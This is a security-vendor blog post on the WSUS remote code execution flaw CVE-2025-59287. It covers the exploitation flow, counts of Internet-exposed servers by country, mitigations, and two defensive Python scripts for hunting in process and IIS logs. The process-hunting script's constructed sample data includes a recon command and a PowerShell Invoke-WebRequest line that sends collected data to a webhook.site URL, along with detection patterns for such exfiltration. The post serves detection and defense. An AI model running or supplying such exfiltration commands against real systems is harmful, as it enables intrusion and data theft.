Still 4,600+ WSUS Servers Unpatched After Critical RCE Flaw (CVE-2025-59287)
Criminal IP
4 min read·Nov 6, 2025
On October 14, 2025, Microsoft disclosed a WSUS remote code execution vulnerability, CVE-2025-59287 (CVSS 9.8). It is exploitable without authentication, proof-of-concept code has been published, and exploitation in the wild has followed. Microsoft's initial fix in the October Patch Tuesday release was incomplete; an emergency out-of-band update followed on October 23, and installing it is strongly recommended.
Breaking Down CVE-2025-59287: The Microsoft WSUS RCE Flaw Explained
CVE-2025-59287 is a deserialization vulnerability in Windows Server Update Services (WSUS): data received by the WSUS web service is deserialized without validation. An attacker who can reach the service can send a crafted AuthorizationCookie that, when deserialized, executes arbitrary code as SYSTEM, with no authentication required.
Because WSUS plays a central role in distributing updates, a compromised WSUS server can become a springboard for lateral movement within the internal network and for large-scale propagation. When WSUS is exposed to the Internet on default ports (8530/8531), it becomes trivially exploitable via automated scanning.
How the WSUS RCE Vulnerability Can Be Exploited
The exploitation flow for WSUS RCE is relatively simple but highly destructive.
- Attackers scan for publicly exposed WSUS instances (default TCP ports 8530/8531) and gain initial access without authentication.
- Forensic process chains observed include:
  wsusservice.exe → cmd.exe → cmd.exe → powershell.exe, or
  w3wp.exe → cmd.exe → cmd.exe → powershell.exe
- These chains execute malicious PowerShell commands. The initial payload runs commands such as whoami, net user /domain, and ipconfig /all to quickly map the internal domain structure and identify high-value accounts for lateral movement.
- Collected information is exfiltrated to attacker-controlled endpoints (e.g., Webhook.site) using Invoke-WebRequest (or curl.exe as needed).
Therefore, WSUS servers must immediately apply Microsoft’s latest security updates. If urgent patching is not possible, temporary mitigations such as blocking the WSUS ports or disabling WSUS should be implemented.
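The process chains and first-stage commands described above can be hunted for in exported process-creation telemetry. The following Python script is an added example for this article, not code from Criminal IP or Microsoft. The event layout it reads (ProcessId, ParentProcessId, Image, CommandLine, as in a JSON export of Sysmon Event ID 1 or Security 4688 records) and the sample events it runs on are assumptions constructed for the demo.

```python
"""Hunt for the WSUS-to-PowerShell process chains described above in
exported process-creation events (Sysmon Event ID 1 / Security 4688 style).

Added example for this article, not code from Criminal IP or Microsoft.
Assumes each event is a dict with ProcessId, ParentProcessId, Image and
CommandLine keys; SAMPLE_EVENTS below are constructed for the demo.
"""
from __future__ import annotations

import ntpath
import re

# Parents that should never spawn an interactive shell on a WSUS host: the WSUS
# service itself and the IIS worker process hosting its ASP.NET application.
WSUS_PARENTS = {"wsusservice.exe", "w3wp.exe"}
TARGET = "powershell.exe"
MAX_DEPTH = 8  # how far up the tree to walk before giving up

# Indicators taken from the article's description of the first-stage payload
# (recon) and its exfiltration step; webhook.site is the endpoint named above.
RECON_PATTERNS = [r"\bwhoami\b", r"\bnet\s+user\s+/domain\b", r"\bipconfig\s+/all\b"]
EXFIL_PATTERNS = [r"Invoke-WebRequest", r"\biwr\b", r"\bcurl(\.exe)?\b", r"webhook\.site"]


def basename(image: str) -> str:
    return ntpath.basename(image).lower()


def ancestry(events_by_pid: dict, pid: int) -> list[str]:
    """Image basenames from pid upward to the oldest ancestor we have an event for."""
    chain: list[str] = []
    seen: set[int] = set()
    cur = events_by_pid.get(pid)
    while cur is not None and len(chain) < MAX_DEPTH and cur["ProcessId"] not in seen:
        seen.add(cur["ProcessId"])  # guards against PID reuse creating a cycle
        chain.append(basename(cur["Image"]))
        cur = events_by_pid.get(cur["ParentProcessId"])
    return chain


def classify_cmdline(cmdline: str) -> list[str]:
    """Tag a command line with the payload stages it resembles."""
    tags = []
    if any(re.search(p, cmdline, re.I) for p in RECON_PATTERNS):
        tags.append("recon")
    if any(re.search(p, cmdline, re.I) for p in EXFIL_PATTERNS):
        tags.append("exfil")
    return tags


def find_wsus_shell_chains(events: list[dict]) -> list[dict]:
    """Return every powershell.exe whose ancestry leads back to WsusService or w3wp.

    The chains observed in the wild pass through two cmd.exe hops, but a direct
    spawn from either parent is just as anomalous, so any WSUS ancestor is flagged.
    """
    events_by_pid = {e["ProcessId"]: e for e in events}
    findings = []
    for e in events:
        if basename(e["Image"]) != TARGET:
            continue
        chain = ancestry(events_by_pid, e["ProcessId"])
        if chain[-1] in WSUS_PARENTS:
            findings.append({
                "pid": e["ProcessId"],
                "chain": " -> ".join(reversed(chain)),
                "tags": classify_cmdline(e.get("CommandLine", "")),
            })
    return findings


CMD = r"C:\Windows\System32\cmd.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
RECON = 'powershell -nop -w hidden -c "whoami; net user /domain; ipconfig /all"'
EXFIL = 'powershell -c "Invoke-WebRequest -Uri https://webhook.site/constructed-token -Method POST -Body $out"'

# Constructed sample: one chain matching each pattern from the article, plus a
# benign PowerShell launched from Explorer that must not be flagged.
SAMPLE_EVENTS = [
    {"ProcessId": 1000, "ParentProcessId": 4, "Image": r"C:\Program Files\Update Services\Service\WsusService.exe", "CommandLine": "WsusService.exe"},
    {"ProcessId": 1100, "ParentProcessId": 1000, "Image": CMD, "CommandLine": 'cmd.exe /c "cmd.exe /c ' + RECON + '"'},
    {"ProcessId": 1200, "ParentProcessId": 1100, "Image": CMD, "CommandLine": "cmd.exe /c " + RECON},
    {"ProcessId": 1300, "ParentProcessId": 1200, "Image": PS, "CommandLine": RECON},
    {"ProcessId": 2000, "ParentProcessId": 4, "Image": r"C:\Windows\System32\inetsrv\w3wp.exe", "CommandLine": "w3wp.exe -ap WsusPool"},
    {"ProcessId": 2100, "ParentProcessId": 2000, "Image": CMD, "CommandLine": 'cmd.exe /c "cmd.exe /c ' + EXFIL + '"'},
    {"ProcessId": 2200, "ParentProcessId": 2100, "Image": CMD, "CommandLine": "cmd.exe /c " + EXFIL},
    {"ProcessId": 2300, "ParentProcessId": 2200, "Image": PS, "CommandLine": EXFIL},
    {"ProcessId": 3000, "ParentProcessId": 4, "Image": r"C:\Windows\explorer.exe", "CommandLine": "explorer.exe"},
    {"ProcessId": 3100, "ParentProcessId": 3000, "Image": PS, "CommandLine": "powershell.exe"},
]

if __name__ == "__main__":
    for finding in find_wsus_shell_chains(SAMPLE_EVENTS):
        print(finding)
```

The ancestry walk uses only the parent PID recorded in each event, so feed it a window of events wide enough to contain the WsusService.exe or w3wp.exe start record; on a long-running server that parent may have started days before the shell did.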
Criminal IP Detection Finds 4,616 Exposed Instances
Attackers first target publicly exposed WSUS instances on the default TCP ports 8530 (HTTP) and 8531 (HTTPS). Criminal IP Asset Search can be used to identify WSUS instances that are reachable from the Internet and therefore visible to exactly that kind of scanning.
WSUS is not a simple file server; it is a web service suite that handles Windows Update Agent client requests and runs on IIS (Internet Information Services) as an ASP.NET application (client APIs, admin console, metadata transfers, etc.). The query that finds WSUS devices, “Microsoft-IIS” port:8530 OR port:8531, therefore combines the HTTP Server header Microsoft-IIS (indicating Windows Server / IIS) with WSUS’s default TCP ports 8530 and 8531. This is a fingerprint, not proof: any IIS site bound to those ports will match, and a WSUS server moved to a non-default port will not, so hits should be confirmed from the individual IP report before acting on them.
Criminal IP Search Query:
“Microsoft-IIS” port:8530 OR port:8531
www.criminalip.io/asset/searc…
As of November 4, 2025, Criminal IP reports a total of 4,616 externally exposed WSUS instances. Note that the search measures exposure, not patch status: an exposed server that has already received the October 23 update is no longer exploitable through this bug, but it remains reachable by every scanner looking for the next one. Given the active exploitation of this unauthenticated RCE, these 4,616 exposed assets are high-priority targets that must be patched and removed from the Internet-facing edge immediately.
Criminal IP Data Breakdown by Country
Using Criminal IP’s Element Analysis, you can view country-level statistics for assets exposed to the WSUS RCE vulnerability.
Criminal IP Element Analysis:
“Microsoft-IIS” port:8530 OR port:8531
www.criminalip.io/intelligenc…
Among the 4,616 exposed assets, the United States accounts for the largest share with 1,033 exposed instances, representing about 22% of the total. Germany, China, and the United Kingdom follow with 395, 286, and 212 exposed instances respectively. These countries host large enterprise infrastructures, making urgent security measures necessary.
In-Depth Analysis of Scanned Target IPs
Clicking into a detected WSUS instance in Criminal IP’s Asset Search provides an IP report for detailed analysis.
For example, analysis of detected WSUS targets shows that some assets have multiple open ports (e.g., SSH on port 22 and WSUS on port 8530). Assets with exposed remote ports are not only initial targets for the active WSUS RCE exploitation but also potential candidates for chained attacks involving additional vulnerabilities.
Security Measures Against the WSUS RCE Vulnerability (CVE-2025-59287)
Because CVE-2025-59287 gives an unauthenticated attacker code execution as SYSTEM, administrators should immediately implement the following measures, which include Microsoft’s official recommendations:
- Apply emergency patches immediately: Install Microsoft’s October 23 out-of-band security update; the October 14 Patch Tuesday fix alone is incomplete.
- Restrict Internet exposure and access controls: WSUS only needs to be reachable by the clients and downstream servers it serves. Block inbound 8530/8531 at the perimeter and host firewall or place the server behind an authenticated proxy, and if patching must be delayed, disable the WSUS role until it can be patched.
- Conduct detailed web and system log analysis: Review IIS logs for requests to the WSUS ports from unexpected sources, and process-creation logs for cmd.exe or powershell.exe spawned by wsusservice.exe or w3wp.exe, to detect potential compromise.
- Continuous attack surface monitoring: Use attack surface management tools such as Criminal IP to proactively check for external exposure of internal assets.
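For the log analysis step, the following Python script is an added example for this article (not Criminal IP’s or Microsoft’s code) that triages an IIS W3C log from a WSUS server and reports which non-internal sources reached ports 8530/8531, how often, and with what status codes. It assumes the default IIS field set, read from the #Fields header; the log lines, request URIs and user agents are constructed for the demo, and the documentation ranges 203.0.113.0/24 and 198.51.100.0/24 stand in for Internet addresses.

```python
"""Triage an IIS W3C log from a WSUS server: which non-internal sources reached
the WSUS ports (8530/8531), how often, and with what result.

Added example for this article, not Criminal IP's or Microsoft's code. The
parser reads the #Fields header, so any IIS layout that includes s-port, c-ip,
cs-uri-stem and sc-status works. SAMPLE_LOG is constructed; its URIs and user
agents are illustrative.
"""
import ipaddress
from collections import defaultdict

WSUS_PORTS = {8530, 8531}

# The organisation's own ranges. Explicit networks are used instead of
# ipaddress's is_private because that flag also covers the RFC 5737
# documentation ranges used as stand-in Internet addresses below.
DEFAULT_INTERNAL = ["10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8"]


def parse_w3c(text: str):
    """Yield one dict per request line, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()  # IIS encodes spaces inside values as '+', so split is safe
            if len(values) == len(fields):
                yield dict(zip(fields, values))


def source_is_internal(ip_str: str, nets) -> bool:
    """True when c-ip falls inside one of the supplied internal networks."""
    try:
        ip = ipaddress.ip_address(ip_str)
    except ValueError:
        return False  # malformed c-ip: treat as external so a human looks at it
    return any(ip in n for n in nets)


def external_wsus_requests(text: str, internal=DEFAULT_INTERNAL) -> dict:
    """Group requests on the WSUS ports by non-internal source address.

    Any entry here means the WSUS web service was reachable from outside,
    whether or not the request was an exploit attempt.
    """
    nets = [ipaddress.ip_network(n) for n in internal]
    hits = defaultdict(lambda: {"count": 0, "uris": set(), "agents": set(), "status": set()})
    for rec in parse_w3c(text):
        if not rec["s-port"].isdigit() or int(rec["s-port"]) not in WSUS_PORTS:
            continue
        src = rec["c-ip"]
        if source_is_internal(src, nets):
            continue
        h = hits[src]
        h["count"] += 1
        h["uris"].add(rec["cs-uri-stem"])
        h["agents"].add(rec.get("cs(User-Agent)", "-"))
        h["status"].add(rec["sc-status"])
    return dict(hits)


# Constructed sample: two internal Windows Update Agents, one Internet source
# hammering the client web service on 8530, one on 8531 that produced a 500,
# and one unrelated hit on port 80 that must be ignored.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2025-10-24 08:00:01 10.0.0.5 POST /ClientWebService/Client.asmx - 8530 - 10.0.0.77 Windows-Update-Agent 200 0 0 31
2025-10-24 08:00:09 10.0.0.5 GET /selfupdate/wuident.cab - 8530 - 192.168.1.20 Windows-Update-Agent 200 0 0 4
2025-10-24 08:02:15 10.0.0.5 POST /ClientWebService/Client.asmx - 8530 - 203.0.113.45 python-requests/2.32.0 200 0 0 118
2025-10-24 08:02:16 10.0.0.5 POST /ClientWebService/Client.asmx - 8530 - 203.0.113.45 python-requests/2.32.0 200 0 0 2207
2025-10-24 08:05:40 10.0.0.5 POST /ClientWebService/Client.asmx - 8531 - 198.51.100.9 Mozilla/5.0+(Windows+NT+10.0) 500 0 0 63
2025-10-24 08:06:02 10.0.0.5 GET / - 80 - 203.0.113.45 Mozilla/5.0 200 0 0 2
2025-10-24 08:07:30 10.0.0.5 POST /ClientWebService/Client.asmx - 8531 - 172.16.5.5 Windows-Update-Agent 200 0 0 27
"""

if __name__ == "__main__":
    for src, info in external_wsus_requests(SAMPLE_LOG).items():
        print(src, info["count"], sorted(info["uris"]), sorted(info["agents"]), sorted(info["status"]))
```

Pass your real address space (including any public ranges you own) as internal; a non-empty result is evidence that the server is Internet-reachable even if every request was benign, and a burst of POSTs from one source with a non-Windows-Update user agent is the pattern to pivot on when checking the process-creation logs.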
Conclusion
CVE-2025-59287 (WSUS RCE) is a high-risk vulnerability that combines unauthenticated remote code execution with the risk of Internet exposure of an internal service. With thousands of assets exposed globally, administrators must prioritize installing Microsoft’s emergency updates, verify and limit external exposure of WSUS servers, and use attack surface management and threat intelligence tools such as Criminal IP for proactive defense.
In relation to this, you can refer to Three Critical Apache Tomcat Vulnerabilities — Over 540K Exposed Instances Need Immediate Inspection (CVE-2025-55752, CVE-2025-55754, CVE-2025-61795).